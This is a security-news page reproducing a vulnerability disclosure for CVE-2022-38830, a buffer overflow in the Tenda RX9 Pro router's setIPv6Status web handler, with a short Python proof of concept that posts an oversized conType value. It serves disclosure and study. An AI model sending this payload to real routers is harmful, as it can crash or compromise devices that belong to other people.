Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38830: CVE/setIPv6Status.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setIPv6Status.

CVE
#buffer_overflow

Permalink

1 contributor

Users who have contributed to this file

buffer overflow****Tenda_RX9_Pro

version: V22.03.02.10

Description:

There is a buffer overflow in httpd/setIPv6Status

Source:

you may download it from : https://www.tendacn.com/download/detail-4218.html

Analyse:

get value from conType and call strcpy, cause buff overflow

POC

url = "http://192.168.1.13/goform/setIPv6Status"
payload = 'A'*300 + '\n'

r = requests.post(url, data={'conType': payload})

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda